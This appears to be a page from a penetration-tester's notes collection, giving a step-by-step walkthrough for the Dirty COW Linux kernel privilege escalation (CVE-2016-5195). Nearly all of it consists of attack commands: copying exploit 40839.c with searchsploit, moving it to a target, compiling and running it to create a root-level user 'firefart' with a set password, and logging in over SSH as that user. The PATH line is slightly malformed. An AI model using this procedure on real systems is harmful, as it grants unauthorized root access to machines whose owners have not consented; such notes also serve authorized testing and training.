[CVE-2016-5195] dirtycow 2

1)sudo searchsploit -m linux/local/40839.c

2)tranfer to target

3)change path as follows

PATH=PATH$:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/lib/gcc/x86_64-linux-gnu/4.8/;export PATH

4)compile

gcc -pthread 40839.c -o dirtycow -lcrypt

5)./dirtycow

Please enter the new password: redcliff

6)once the exploit is done, it creates a new user named firefart : password is redcliff

7)ssh into new user (firefart)

sudo ssh firefart@10.10.10.10

Password: redcliff

#root

PreviousServ-U FTP Server < 15.1.7NextLinux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5...)

Last updated